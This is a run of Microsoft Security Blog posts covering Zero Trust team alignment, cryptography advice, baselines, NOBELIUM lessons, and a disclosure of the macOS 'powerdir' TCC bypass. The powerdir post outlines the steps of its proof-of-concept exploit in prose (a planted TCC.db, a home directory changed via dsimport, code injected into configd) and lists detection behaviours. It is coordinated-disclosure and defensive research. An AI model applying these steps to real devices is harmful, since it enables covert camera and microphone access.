Jennifer: When there’s an erosion of trust and greater friction, it makes everything harder. Projects take longer. Decisions take longer. That lack of collaboration can also introduce security gaps. I have several examples, but I’m going to pick healthcare here. Say the Chief Information Security Officer’s (CISO) team believes that their bio-medical devices are secured a certain way from a network perspective, but that’s not how they’re secured. Meaning, they’re secured at a lower level that would not be sufficient based on how the CISO and the compliance teams were tracking it. So, there’s this misalignment, miscommunication. Not that it’s malicious; nobody is doing it on purpose, but requirements aren’t communicated well. Sometimes there’s a lack of clarity about whose responsibility it is, and what those requirements are. Even within larger organizations, it might not be clear what the actual standards and processes are that support that policy from the perspective of governance, risk, and compliance (GRC).

Natalia: So, what are a few effective ways to align the SOC and NOC?

Jennifer: If you can find somebody that can be a third partysomebody that’s going to come in and help the teams collaborate and build trustit’s invaluable. It can be someone who specializes in organizational health or a technical third party; somebody like me sitting in the middle who says, “I understand what the networking team is saying. I hear you. And I understand what the security requirements are. I get it.” Then you can figure out how to bridge that gap and get both teams collaborating with bi-directional communication, instead of security just mandating that this thing gets done.

It’s also about the culturethe interpersonal relationships involved. It can be a problem if one team is picked (to be in charge) instead of another. Maybe it’s the SOC team versus the NOC team, and the SOC team is put in charge; therefore, the NOC team just gives up. It might be better to go with a neutral internal person instead, like a program manager or a digital-transformation leadersomebody who owns a program or a project but isn’t tied to the specifics of security or network architecture. Building that kind of cross-functional team between departments is a good way to solve problems.

There isn’t a wrong way to do it if everybody is being heard. Emails are not a great way to accomplish communication among teams. But getting people together, outlining what the goal is, and working towards it, that’s preferable to just having discrete decision points and mandates. Here’s the big goalwhat are some ideas to get from point A to point B? That’s something we must do moving into Zero Trust strategies.

Natalia: Speaking of Zero Trust, how does Zero Trust figure into an overarching strategy for a business?

Jennifer: I describe Zero Trust as a concept. It’s more of a mindset, like “defense in depth,” “layered defense,” or “concepts of least privilege.” Trying to put it into a fixed model or framework is what’s leading to a lot of the misconceptions around the Zero Trust strategy. For me, getting from point A to point B with organizations means taking baby stepsidentifying gaps, use cases, and then finding the right solutions.

A lot of people assume Zero Trust is this granular one-to-one relationship of every element on the network. Meaning, every user, every endpoint, every service, and application data set is going to have a granular “allow or deny” policy. That’s not what we’re doing right now. Zero Trust is just a mindset of removing inherent trust. That could mean different things, for example, it could be remote access for employees on a virtual private network (VPN), or it could be dealing with employees with bring your own device (BYOD). It could mean giving contractors or people with elevated privileges access to certain data sets or applications, or we could apply Zero Trust principles to secure workloads from each other.

Natalia: And how does Secure Access Service Edge (SASE) differ from Zero Trust?

Jennifer: Zero Trust is not a product. SASE, on the other hand, is a suite of products and services put together to help meet Zero Trust architecture objectives. SASE is a service-based product offering that has a feature set. It varies depending on the manufacturer, meaning, some will give you these three features and some will give you another five or eight. Some are based on endpoint technology, some are based on software-defined wide area network (SD-WAN) solutions, while some are cloud routed.

Natalia: How does the Zero Trust approach fit with the network access control (NAC) strategy?

Jennifer: I jokingly refer to Zero Trust as “NAC 4.0.” I’ve worked in the NAC space for over 15 years, and it’s just a few new variables. But they’re significant variables. Working with cloud-hosted resources in cloud-routed data paths is fundamentally different than what we’ve been doing in local area network (LAN) based systems. But if you abstract thatthe concepts of privilege, authentication, authorization, and data pathsit’s all the same. I lump the vendors and types of solutions into two different categories: cloud-routed versus traditional on-premises (for a campus environment). The technologies are drastically different between those two use cases. For that reason, the enforcement models are different and will vary with the products. 

Natalia: How do you approach securing remote access with a Zero Trust mindset? Do you have any guidelines or best practices?

Jennifer: It’s alarming how many organizations set up VPN remote access so that users are added onto the network as if they were sitting in their office. For a long time that was accepted because, before the pandemic, there was a limited number of remote users. Now, remote access, in addition to the cloud, is more prevalent. There are many people with personal devices or some type of blended, corporate-managed device. It’s a recipe for disaster.

The threat surface has increased exponentially, so you need to be able to go back in and use a Zero Trust product in a kind of enclave model, which works a lot like a VPN. You set up access at a point (wherever the VPN is) and the users come into that. That’s a great way to start and you can tweak it from there. Your users access an agent or a platform that will stay with them through that process of tweaking and tuning. It’s impactful because users are switching from a VPN client to a kind of a Zero Trust agent. But they don’t know the difference because, on the back end, the access is going to be restricted. They’re not going to miss anything. And there’s lots of modeling engines and discovery that products do to map out who’s accessing what, and what’s anomalous. So, that’s a good starting point for organizations.

Natalia: How should businesses think about telemetry? How can security and networking teams best use it to continue to keep the network secure?

Jennifer: You need to consider the capabilities of visibility, telemetry, and discovery on endpoints. You’re not just looking at what’s on the endpointwe’ve been doing thatbut what is the endpoint talking to on the internet when it’s not behind the traditional perimeter. Things like secure web gateways, or solutions like a cloud access security broker (CASB), which further extends that from an authentication standpoint, data pathing with SD-WAN routing—all of that plays in.

Natalia: What is a common misconception about Zero Trust?

Jennifer: You don’t have to boil the ocean with this. We know from industry reports, analysts, and the National Institute of Standards and Technology (NIST) that there’s not one product that’s going to meet all the Zero Trust requirements. So, it makes sense to chunk things into discrete programs and projects that have boundaries, then find a solution that works for each. Zero Trust is not about rip and replace.

The first step is overcoming that mental hurdle of feeling like you must pick one product that will do everything. If you can aggregate that a bit and find a product that works for two or three, that’s awesome, but it’s not a requirement. A lot of organizations are trying to research everything ad nauseum before they commit to anything. But this is a volatile industry, and it’s likely that with any product’s features, the implementation is going to change drastically over the next 18 months. So, if you’re spending nine months researching something, you’re not going to get the full benefit in longevity. Just start with something small that’s palatable from a resource and cost standpoint.

Natalia: What types of products work best in helping companies take a Zero Trust approach?

Jennifer: A lot of requirements stem from the organization’s technological culture. Meaning, is it on-premises or a cloud environment? I have a friend that was a CISO at a large hospital system, which required having everything on-premises. He’s now a CISO at an organization that has zero on-premises infrastructure; they’re completely in the cloud. It’s a night-and-day change for security. So, you’ve got that, combined with trying to integrate with what’s in the environment currently. Because typically these systems are not greenfield, they’re brownfield—we’ve got users and a little bit of infrastructure and applications, and it’s a matter of upfitting those things. So, it just depends on the organization. One may have a set of requirements and applications that are newer and based on microservices. Another organization might have more on-premises legacy infrastructure architectures, and those aren’t supported in a lot of cloud-native and cloud-routed platforms.

Natalia: So, what do you see as the future for the SOC and NOC?

Jennifer: I think the message moving forward is—we must come together. And it’s not just networking and security; there are application teams to consider as well. It’s the same with IoT. These are transformative technologies. Whether it’s the combination of operational technology (OT) and IT, or the prevalence of IoT in the environment, or Zero Trust initiatives, all of these demand cross-functional teams for trust building and collaboration. That’s the big message.

Learn more

Get key resources from Microsoft Zero Trust strategy decision makers and deployment teams. To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post Align your security and network teams to Zero Trust security demands appeared first on Microsoft Security Blog.

New macOS vulnerability, “powerdir,” could lead to unauthorized user data access

Following our discovery of the “Shrootless” vulnerability, Microsoft uncovered a new macOS vulnerability, “powerdir,” that could allow an attacker to bypass the operating system’s Transparency, Consent, and Control (TCC) technology, thereby gaining unauthorized access to a user’s protected data. We shared our findings with Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR). Apple released a fix for this vulnerability, now identified as CVE-2021-30970, as part of security updates released on December 13, 2021. We encourage macOS users to apply these security updates as soon as possible.

Introduced by Apple in 2012 on macOS Mountain Lion, TCC is essentially designed to help users configure the privacy settings of their apps, such as access to the device’s camera, microphone, or location, as well as access to the user’s calendar or iCloud account, among others. To protect TCC, Apple introduced a feature that prevents unauthorized code execution and enforced a policy that restricts access to TCC to only apps with full disk access. We discovered that it is possible to programmatically change a target user’s home directory and plant a fake TCC database, which stores the consent history of app requests. If exploited on unpatched systems, this vulnerability could allow a malicious actor to potentially orchestrate an attack based on the user’s protected personal data. For example, the attacker could hijack an app installed on the device—or install their own malicious app—and access the microphone to record private conversations or capture screenshots of sensitive information displayed on the user’s screen.

It should be noted that other TCC vulnerabilities were previously reported and subsequently patched before our discovery. It was also through our examination of one of the latest fixes that we came across this bug. In fact, during this research, we had to update our proof-of-concept (POC) exploit because the initial version no longer worked on the latest macOS version, Monterey. This shows that even as macOS or other operating systems and applications become more hardened with each release, software vendors like Apple, security researchers, and the larger security community, need to continuously work together to identify and fix vulnerabilities before attackers can take advantage of them.

Microsoft security researchers continue to monitor the threat landscape to discover new vulnerabilities and attacker techniques that could affect macOS and other non-Windows devices. The discoveries and insights from our research enrich our protection technologies and solutions, such as Microsoft Defender for Endpoint, which allows organizations to gain visibility to their networks that are increasingly becoming heterogeneous. For example, this research informed the generic detection of behavior associated with this vulnerability, enabling Defender for Endpoint to immediately provide visibility and protection against exploits even before the patch is applied. Such visibility also enables organizations to detect, manage, respond to, and remediate vulnerabilities and cross-platform threats faster.

In this blog post, we will share some information about TCC, discuss previously reported vulnerabilities, and present our own unique findings.

TCC overview

As mentioned earlier, TCC is a technology that prevents apps from accessing users’ personal information without their prior consent and knowledge. The user commonly manages it under System Preferences in macOS (System Preferences > Security & Privacy > Privacy):

Screenshot of the Security & Privacy pane on macOS
Figure 1. The macOS Security & Privacy pane that serves as the front end of TCC.

TCC maintains databases that contain consent history for app requests. Generally, when an app requests access to protected user data, one of two things can happen:

  1. If the app and the type of request have a record in the TCC databases, then a flag in the database entry dictates whether to allow or deny the request without automatically and without any user interaction.
  2. If the app and the type of request do not have a record in the TCC databases, then a prompt is presented to the user, who decides whether to grant or deny access. The said decision is backed into the databases so that succeeding similar requests will now fall under the first scenario.

Under the hood, there are two kinds of TCC databases. Each kind maintains only a subset of the request types:

  • User-specific database: contains stored permission types that only apply to the specific user profile; it is saved under ~/Library/Application Support/com.apple.TCC/TCC.db and can be accessed by the user who owns the said profile
  • System-wide database: contains stored permission types that apply on a system level; it is saved under /Library/Application Support/com.apple.TCC/TCC.db and can be accessed by users with root or full disk access

macOS implements the TCC logic by using a special daemon called tccd. Indeed, there are at least two instances of tccd: one run by the user and the other by root.

Screenshot of two tccd instances
Figure 2. Two tccd instances: per-user and system-wide.

Each type of request starts with a kTCCService prefix. While not an exhaustive list, below are some examples:

Request type Description Handled by
kTCCServiceLiverpool Location services access User-specific TCC database
kTCCServiceUbiquity iCloud access User-specific TCC database
kTCCServiceSystemPolicyDesktopFolder Desktop folder access User-specific TCC database
kTCCServiceCalendar Calendar access User-specific TCC database
kTCCServiceReminders Access to reminders User-specific TCC database
kTCCServiceMicrophone Microphone access User-specific TCC database
kTCCServiceCamera Camera access User-specific TCC database
kTCCServiceSystemPolicyAllFiles Full disk access capabilities System-wide TCC database
kTCCServiceScreenCapture Screen capture capabilities System-wide TCC database
Table 1. Types of TCC requests.

It should also be noted that the TCC.db file is a SQLITE database, so if a full disk access is granted to a user, they can view the database and even edit it:

Screenshot of TCC.db access table dump
Figure 3. Dumping the TCC.db access table, given a full disk access.

The database columns are self-explanatory, save for the csreq column. The csreq values contain a hexadecimal blob that encodes the code signing requirements for the app. These values can be calculated easily with the codesign and csreq utilities, as seen in Figure 4 below:

Screenshot of building the csreq blob
Figure 4. Building the csreq blob manually for an arbitrary app.

Given these, should a malicious actor gain full disk access to the TCC databases, they could edit it to grant arbitrary permissions to any app they choose, including their own malicious app. The affected user would also not be prompted to allow or deny the said permissions, thus allowing the app to run with configurations they may not have known or consented to.

Securing (and bypassing) TCC: Techniques and previously reported vulnerabilities

Previously, apps could access the TCC databases directly to view and even modify their contents. Given the risk of bypass mentioned earlier, Apple made two changes. First, Apple protected the system-wide TCC.db via System Integrity Protection (SIP), a macOS feature that prevents unauthorized code execution. Secondly, Apple enforced a TCC policy that only apps with full disk access can access the TCC.db files. Note, though, that this policy was also subsequently abused as some apps required such access to function properly (for example, the SSH daemon, sshd).

Interestingly, attackers can still find out whether a user’s Terminal has full disk access by simply trying to list the files under /Library/Application Support/com.apple.TCC. A successful attempt means that the Terminal has full disk access capabilities, and an attacker can, therefore, freely modify the user’s TCC.db.

In addition, there have been several previously reported vulnerabilities related to TCC bypass. These include the following:

  • Time Machine mounts (CVE-2020-9771): macOS offers a built-in backup and restore solution called Time Machine. It was discovered that Time Machine backups could be mounted (using the apfs_mount utility) with the “noowners” flag. Since these backups contain the TCC.db files, an attacker could mount those backups and determine the device’s TCC policy without having full disk access.
  • Environment variable poisoning (CVE-2020-9934): It was discovered that the user’s tccd could build the path to the TCC.db file by expanding $HOME/Library/Application Support/com.apple.TCC/TCC.db. Since the user could manipulate the $HOME environment variable (as introduced to tccd by launchd), an attacker could plant a chosen TCC.db file in an arbitrary path, poison the $HOME environment variable, and make TCC.db consume that file instead.
  • Bundle conclusion issue (CVE-2021-30713): First disclosed by Jamf in a blog post about the XCSSET malware family, this bug abused how macOS was deducing app bundle information. For example, suppose an attacker knows of a specific app that commonly has microphone access. In that case, they could plant their application code in the target app’s bundle and “inherit” its TCC capabilities.

Apple has since patched these vulnerabilities. However, based on our research, the potential bypass to TCC.db can still occur. The following section discusses the vulnerability we discovered and some details about the POC exploits we developed to prove the said vulnerability.

Modifying the home directory: The ‘powerdir’ vulnerability

In assessing the previous TCC vulnerabilities, we evaluated how Apple fixed each issue. One fix that caught our attention was for CVE-2020-9934 (the $HOME environment variable poisoning vulnerability). The fix can be seen in the _db_open function in tccd:

Screenshot of the tccd fix for CVE-2020-9934
Figure 5. The tccd fix for CVE-2020-9934.

We noted that instead of expanding the $HOME environment variable, Apple decided to invoke getpwuid() on the current user (retrieved with getuid()). First, the getpwuid function retrieves a structure in memory (struct password*) that contains information about the given user. Then, tccd extracts the pwdir member from it. This pwdir member includes the user’s home directory, and its value persists even after the $HOME environment variable is modified.

While the solution indeed prevents an attack by environment variable poisoning, it does not protect against the core issue. Thus, we set out to investigate: can an app programmatically change the user’s home directory and plant a fake TCC.db file?

The first POC exploit

Our first attempt to answer the above question was simple: plant a fake TCC.db file and change the home directory using the Directory Services command-line utility (dscl):

While requiring root access, we discovered that this works only if the app is granted with the TCC policy kTCCServiceSystemPolicySysAdminFiles, which the local or user-specific TCC.db maintains. That is weaker than having full disk access, but we managed to bypass that restriction with the dsexport and dsimport utilities.

Next, simply by exporting the Directory Services entry of a user, manipulating the output file, and importing the file again, we managed to bypass the dscl TCC policy restriction.

Our first POC exploit, therefore, does the following:

  1. Get a csreq blob for the target app.
  2. Plant a fake TCC.db file with required access and the csreq blob.
  3. Export the user’s Directory Services entry with dsexport.
  4. Modify the Directory Services entry to change the user’s home directory.
  5. Import the modified Directory Services entry with dsimport.
  6. Stop the user’s tccd and reboot the process.

Using this exploit, an attacker could change settings on any application. In the screenshot below, we show how the exploit could allow attackers to enable microphone and camera access on any app, for example, Teams.

Screenshot of the working exploit
Figure 6. Our first working POC exploit working without a popup notification from TCC.

We reported our initial findings to the Apple product security team on July 15, 2021, before becoming aware of a similar bypass presented by Wojciech Reguła and Csaba Fitzl at BlackHat USA 2021 in August. However, our exploit still worked even after Apple fixed the said similar finding (now assigned as CVE-2020-27937). Therefore, we still considered our research to be a new vulnerability.

Monterey release and the second POC exploit

We shared our findings to Apple through Coordinated Vulnerability Disclosure (CVD) via Microsoft Security Vulnerability Research (MSVR) before the release of macOS Monterey in October. However, upon the release of the said version, we noticed that our initial POC exploit no longer worked because of the changes made in how the dsimport tool works. Thus, we looked for another way of changing the home directory silently.

While examining macOS Monterey, we came across /usr/libexec/configd, an Apple binary shipped with the said latest macOS release that is a System Configuration daemon responsible for many configuration aspects of the local system. There are three aspects of configd that we took note and made use of:

  1. It is an Apple-signed binary entitled with “com.apple.private.tcc.allow” with the value kTCCServiceSystemPolicySysAdminFiles. This means it can change the home directory silently.
  2. It has extensibility in configuration agents, which are macOS Bundles under the hood. This hints that it might load a custom Bundle, meaning we could inject code for our purposes.
  3. It does not have the hardened runtime flag to load custom configuration agents. While this aspect is most likely by design, it also means we could load completely unsigned code into it.

By running configd with the -t option, an attacker could specify a custom Bundle to load. Therefore, our new POC exploit replaces the dsexport and dsimport method of changing the user’s home directory with a configd code injection. This results in the same outcome as our first POC exploit, which allows the modification of settings to grant, for example, any app like Teams, to access the camera, among other services.

As before, we shared our latest findings with Apple. Again, we want to thank their product security team for their cooperation.

Detecting the powerdir vulnerability with Microsoft Defender for Endpoint

Our research on the powerdir vulnerability is yet another example of the tight race between software vendors and malicious actors: that despite the continued efforts of the former to secure their applications through regular updates, other vulnerabilities will inevitably be uncovered, which the latter could exploit for their own gain. And as system vulnerabilities are possible entry points for attackers to infiltrate an organization’s network, comprehensive protection is needed to allow security teams to manage vulnerabilities and threats across all platforms.

Microsoft Defender for Endpoint is an industry-leading, cloud-powered endpoint security solution that lets organizations manage their heterogeneous computing environments through a unified security console. Its threat and vulnerability management capabilities empower defenders to quickly discover, prioritize, and remediate misconfigurations and vulnerabilities, such as the powerdir vulnerability. In addition, Defender for Endpoint’s unparalleled threat optics are built on the industry’s deepest threat intelligence and backed by world-class security experts who continuously monitor the threat landscape.

One of the key strengths of Defender for Endpoint is its ability to generically detect and recognize malicious behavior. For example, as seen in the previous section, our POC exploits conduct many suspicious activities, including:

  • Dropping a new TCC.db file with an appropriate directory structure
  • Killing an existing tccd instance
  • Suspicious Directory Services invocations such as dsimport and dsexport

By generically detecting behavior associated with CVE-2020-9934 (that is, dropping a new TCC.db file fires an alert), Defender for Endpoint immediately provided protection against these exploits before the powerdir vulnerability was patched. This is a testament of Defender for Endpoint’s capabilities: with strong, intelligent generalization, it will detect similar bypass vulnerabilities discovered in the future.

Screenshot of Microsoft Defender for Endpoint alert for potential TCC bypass
Figure 7. Microsoft Defender for Endpoint detecting potential TCC bypass.

Learn how Microsoft Defender for Endpoint delivers a complete endpoint security solution across all platforms.

Jonathan Bar Or

Microsoft 365 Defender Research Team

The post New macOS vulnerability, “powerdir,” could lead to unauthorized user data access appeared first on Microsoft Security Blog.

What you need to know about how cryptography impacts your security strategy

January 4th, 2022 No comments

The security community is continuously changing, growing, and learning from each other to better position the world against cyber threats. In the latest post of our Voice of the Community blog series post, Microsoft Security Product Marketing Manager Natalia Godyla talks with Taurus SA Co-founder and Chief Security Officer Jean-Philippe “JP” Aumasson, author of “Serious Cryptography.” In this blog post, JP shares insights on learning and applying cryptography knowledge to strengthen your cybersecurity strategy.

Natalia: What drew you to the discipline of cryptography?

JP: People often associate cryptography with mathematics. In my case, I was not good at math when I was a student, but I was fascinated by the applications of cryptography and everything that has to do with secrecy. Cryptography is sometimes called the science of secrets. I was also interested in hacking techniques. At the beginning of the internet, I liked reading online documentation magazines and playing with hacking tools, and cryptography was part of this world.

Natalia: In an organization, who should be knowledgeable about the fundamentals of cryptography?

JP: If you had asked me 10 to 15 years ago, I might have said all you need is to have an in-house cryptographer who specializes in crypto and other people can ask them questions. Today, however, cryptography has become substantially more integrated into several components that we work with and those engineers must develop.

The good news is that crypto is far more approachable than it used to be, and is better documented. The software libraries and APIs are much easier to work with for non-specialists. So, I believe that all the engineers who work with software—from a development perspective, a development operations (DevOps) perspective, or even quality testing—need to know some basics of what crypto can and cannot do and the main crypto concepts and tools.

Natalia: Who is responsible for educating engineering on cryptography concepts?

JP: It typically falls on the security team—for example, through security awareness training. Before starting development, you create the functional requirements driven by business needs. You also define the security goals and security requirements, such as personal data, that must be encrypted at rest and in transit with a given level of security. It’s truly a part of security engineering and security architecture. I advocate for teaching people fundamentals, such as confidentiality, integrity, authentication, and authenticated encryption.

As a second step, you can think of how to achieve security goals thanks to cryptography. Concretely, you have to protect some data, and you might think, “What does it mean to encrypt the data?” It means choosing a cipher with the right parameters, like the right key size. You may be restricted by the capability of the underlying hardware and software libraries, and in some contexts, you may have to use Federal Information Processing Standard (FIPS) certified algorithms.

Also, encryption may not be enough. Most of the time, you also need to protect the integrity of the data, which means using an authentication mechanism. The modern way to realize this is by using an algorithm called an authenticated cipher, which protects confidentiality and authenticity at the same time, whereas the traditional way to achieve this is to combine a cipher and a message authentication code (MAC).

Natalia: What are common mistakes practitioners tend to make?

JP: People often get password protection wrong. First, you need to hash passwords, not encrypt them—except in some niche cases. Second, to hash passwords you should not use a general-purpose hash function such as SHA-256 or BLAKE2. Instead, you should use a password hashing function, which is a specific kind of hashing algorithm designed to be slow and sometimes use a lot of memory, to make password cracking harder.

A second thing people tend to get wrong is authenticating data using a MAC algorithm. A common MAC construction is the hash-based message authentication code (HMAC) standard. However, people tend to believe that HMAC means the same thing as MAC. It’s only one possible way to create a MAC, among several others. Anyway, as previously discussed, today you often won’t need a MAC because you’ll be using an authenticated cipher, such as AES-GCM.

Natalia: How does knowledge of cryptography impact security strategy?

JP: Knowledge of cryptography can help you protect the information more cost-effectively. People can be tempted to put encryption layers everywhere but throwing crypto at a problem does not necessarily solve it. Even worse, once you choose to encrypt something, you have a second problem—key management, which is always the hardest part of any cryptographic architecture. So, knowing when and how to use cryptography will help you achieve sound risk management and minimize the complexity of your systems. In the long run, it pays off to do the right thing.

For example, if you generate random data or bytes, you must use a random generator. Auditors and clients might be impressed if you tell them that you use a “true” hardware generator or even a quantum generator. These might sound impressive, but from a risk management perspective, you’re often better off using an established open-source generator, such as that of the OpenSSL toolkit.

Natalia: What are the biggest trends in cryptography?

JP: One trend is post-quantum cryptography, which is about designing cryptographic algorithms that would not be compromised by a quantum computer. We don’t have quantum computers yet, and the big question is when, if ever, will they arrive? Post-quantum cryptography consequently, can be seen as insurance.

Two other major trends are zero-knowledge proofs and multi-party computation. These are advanced techniques that have a lot of potential to scale decentralized applications. For example, zero-knowledge proofs can allow you to verify that the output of a program is correct without re-computing the program by verifying a short cryptographic proof, which takes less memory and computation. Multi-party computation, on the other hand, allows a set of parties to compute the output of a function without knowing the input values. It can be loosely described as executing programs on encrypted data. Multi-party computation is proposed as a key technology in managed services and cloud applications to protect sensitive data and avoid single points of failure.

One big driver of innovation is the blockchain space, where zero-knowledge proofs and multi-party computation are being deployed to solve very real problems. For example, the Ethereum blockchain uses zero-knowledge proofs to improve the scalability of the network, while multi-party computation can be used to distribute the control of cryptocurrency wallets. I believe we will see a lot of evolution in zero-knowledge proofs and multi-party computation in the next 10 to 20 years, be it in the core technology or the type of application.

It would be difficult to train all engineers in these complex cryptographic concepts. So, we must design systems that are easy to use but can securely do complex and sophisticated operations. This might be an even bigger challenge than developing the underlying cryptographic algorithms.

Natalia: What’s your advice when evaluating new cryptographic solutions?

JP: As in any decision-making process, you need reliable information. Sources can be online magazines, blogs, or scientific journals. I recommend involving cryptography specialists to:

  1. Gain a clear understanding of the problem and the solution needed.
  2. Perform an in-depth evaluation of the third-party solutions offered.

For example, if a vendor tells you that they use a secret algorithm, it’s usually a major red flag. What you want to hear is something like, “We use the advanced encryption standard with a key of 256 bits and an implementation protected against side-channel attacks.” Indeed, your evaluation should not be about the algorithms, but how they are implemented. You can use the safest algorithm on paper, but if your implementation is not secure, then you have a problem.

Learn more

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us at @MSFTSecurity for the latest news and updates on cybersecurity.

The post What you need to know about how cryptography impacts your security strategy appeared first on Microsoft Security Blog.

Azure App Service Linux source repository exposure

December 22nd, 2021 No comments

MSRC was informed by Wiz.io, a cloud security vendor, under Coordinated Vulnerability Disclosure (CVD) of an issue where customers can unintentionally configure the .git folder to be created in the content root, which would put them at risk for information disclosure. This, when combined with an application configured to serve static content, makes it possible …

Azure App Service Linux source repository exposure Read More »

Categories: Uncategorized Tags:

Security baseline for Windows 10, version 21H2

December 20th, 2021 No comments

We are pleased to announce the release of the Windows 10, version 21H2 security baseline package!


 


Please download the content from the Microsoft Security Compliance Toolkit, test the recommended configurations, and customize / implement as appropriate.


 


This Windows 10 feature update brings very few new policy settings. One setting has been added for this release for printer driver installation restrictions (which was also added to the Windows 11 release). Additionally, all Microsoft Edge Legacy settings have been removed.


 


Restrict Driver Installations


In July a Knowledge Base article and subsequent patch was released for CVE-2021-34527, more commonly known as “PrintNightmare”. We have added a new setting to the MS Security Guide (Administrative Templates\Printers\Limits print driver installation to Administrators) and enforced the enablement.  Note this setting was previously a custom setting in SecGuide.admx/l and has since moved inbox.


 


Microsoft Edge Legacy


Microsoft Edge Legacy (EdgeHTML-based) reached end of support on March 9, 2021 and is not part of Windows 10 21H2. Therefore, the settings that supported it have been removed from the baseline. Going forward, please use the new Microsoft Edge (Chromium-based) baseline, which is on a separate release cadence and available as part of the Microsoft Security Compliance Toolkit.


 


Tamper Protection


While you are enabling the Microsoft Security Baseline, make sure to enable Microsoft Defender for Endpoint’s “Tamper Protection” to add a layer of protection against Human Operated Ransomware.



As a reminder, our security baselines for the endpoint also include Microsoft 365 Apps for Enterprise, which we recently released, as well as Microsoft Edge and Windows Update.


 


Please let us know your thoughts by commenting on this post or via the Security Baseline Community.

Categories: Uncategorized Tags:

The final report on NOBELIUM’s unprecedented nation-state attack

December 15th, 2021 No comments

This is the final post in a four-part series on the NOBELIUM nation-state cyberattack. In December 2020, Microsoft began sharing details with the world about what became known as the most sophisticated nation-state cyberattack in history. Microsoft’s four-part video series “Decoding NOBELIUM” pulls the curtain back on the NOBELIUM incident and how world-class threat hunters from Microsoft and around the industry came together to take on the most sophisticated nation-state attack in history. In this last post, we’ll reflect on lessons learned as covered in the fourth episode of the docuseries. 

Nation-state attacks are a serious and growing threat that organizations of all sizes face. Their primary objective is to gain strategic advantage for their country, such as by stealing secrets, gathering cyber intelligence, conducting reconnaissance, or disrupting operations. These efforts are typically conducted by state-sponsored actors with significant expertise and funding, making them a particularly challenging adversary to defend against.

NOBELIUM, a Russian-linked group, is perhaps best known for the widespread SolarWinds supply chain breach. The incident was part of an even larger and more advanced campaign that had been quietly underway for more than a year. As details of this attack were uncovered, it became clear that it was the most sophisticated nation-state cyberattack in history.

In the final episode of our “Decoding NOBELIUM” series, we provide an after-action report that explores Microsoft’s findings and discusses lessons learned.

NOBELIUM deployed extensive tactics

Let’s start by reviewing the key stages of the attack.

The intrusion

It’s critical to understand how NOBELIUM achieved penetration into environments. Going beyond the supply chain compromise, this actor also deployed many common-place tactics like password spraying or exploiting the vulnerabilities of unpatched devices to steal credentials and gain access to systems. Ultimately, NOBELIUM leveraged a wide range of techniques to achieve penetration and adapted their toolset to each victim’s unique environment in order to achieve their goals.

The exploitation

Once NOBELIUM had gained entry, they followed the typical pattern for internal reconnaissance: discover the elevated accounts, find out which machines were there, and create a sophisticated map to understand how to reach their targets. They demonstrated extensive knowledge of enterprise environments and cybersecurity systems by evading defenses, masking activities in regular system processes, and hiding malware under many layers of code.

The exfiltration

Armed with an understanding of their target’s environment, NOBELIUM executed their plan—gaining access to their source codes, harvesting emails, or stealing production secrets.

NOBELIUM demonstrated patience and stealth

The NOBELIUM group moved methodically to avoid getting caught. “They were so deliberate and careful about what they did. It wasn’t like a smash and grab, where they came in and just vacuumed up everything and fled,” said Security Analyst Joanne of the Microsoft Digital Security and Resilience (DSR) Security Operations Center (SOC) Hunt Team.

It took time to move undetected through networks, gathering information and gaining access to privileged networks. For example, they disabled organizations’ endpoint detection and response (EDR) solutions from being launched upon system startups. NOBELIUM then waited up to a month for computers to be rebooted on a patch day and took advantage of vulnerable machines that hadn’t been patched.

“The adversary showed discipline in siloing all of the technical indicators that would give up their presence,” said John Lambert, General Manager of the Microsoft Threat Intelligence Center. “Malware was named different things. It was compiled in different ways. The command and control domains they would use differed per victim. As they moved laterally within a network from machine to machine, NOBELIUM took great pains to clean up after each step.”

Preparing for future nation-state attacks

When adversaries take this much care in hiding their activities, it can take the detection of many seemingly benign activities across different vectors pulled together to highlight one overall technique.

“In order to respond to an attack like NOBELIUM, with its scope and breadth and sophistication, you need to have visibility into various entities across your entire digital state,” explains Sarah Fender, Partner Group Program Manager for Microsoft Sentinel. “You need to have visibility into security data and events relating to users and endpoints, infrastructure, on-premises and in the cloud, and the ability to quickly analyze that data.”

NOBELIUM leveraged users and credentials as a critical vector for intrusion and escalation. Identity-based attacks are on the rise. “Once I can authenticate into your environment, I don’t need malware anymore, so that means monitoring behaviors,” says Roberto, Principal Consultant and Lead Investigator for Microsoft’s Detection and Response Team. “Building a profile for when Roberto’s using his machine, he accesses these 25 resources, and he does these kinds of things and he’s never been in these four countries. If I ever see something that doesn’t fit that pattern, I need to alert on it.” 

Bottom line: ensure you are protecting your identities.

Finally, if we’ve learned anything, it’s that we need to take care of our security teams, especially during a cybersecurity incident. 

“Defender fatigue is a real thing,” says Lambert. “You have to be able to invest in those defenders so that they can surge when they need to. Security, like other professions, is not just a job, it’s also a calling. But it also leads to fatigue and exhaustion if the incident drumbeat is too strong. You have to have reserves and plan for that so that you can support your defenders and rest them in between incidents.”

As we prepare for future attacks, it comes down to joining forces. 

“When I think about what this incident means going forward, it certainly reinforces the need for the world to work together on these threats,” explains Lambert. “No one company sees it all and it is very important, especially with sophisticated threats, to be able to work very quickly with lines of trust established. This is not just about companies working together, it’s also about individuals trusting each other, impacted companies, fellow security industry companies, and government institutions.”

How can you protect your organization and defenders?

Learn more in the final episode of our four-part video series “Decoding NOBELIUM,” where security professionals give insights from the after-action report on NOBELIUM. Thanks for joining us for this series and check out the other posts in the series:

Microsoft is committed to helping organizations stay protected from cyberattacks, whether cybercriminal or nation-state. Consistent with our mission to provide security for all, Microsoft will use our leading threat intelligence and a global team of dedicated cybersecurity defenders to partner across the security industry and help protect our customers and the world. Just some recent examples of Microsoft’s efforts to combat nation-state attacks include:

  • The investigation of ongoing targeted activity by NOBELIUM against privileged accounts of service providers to gain access to downstream customers.
  • The September 2021 discovery and investigation of a NOBELIUM malware referred to as FoggyWeb.
  • The May 2021 profiling of NOBELIUM’s early-stage toolset of EnvyScout, BoomBox, NativeZone, and VaporRage.
  • Issuing more than 1,600 notifications to more than 40 IT companies alerting them to targeting by several Iranian threat groups (from May through October, those threats were 10 to 13 percent of the total notifications).
  • The seizure of websites operated by NICKEL, a China-based threat actor, and the disruption of ongoing attacks targeting organizations in 29 countries.
  • The investigation of Iran-linked DEV-0343, conducting password spraying focused on United States and Israeli defense technology companies, Persian Gulf ports of entry, and global maritime transportation companies with a business presence in the Middle East.

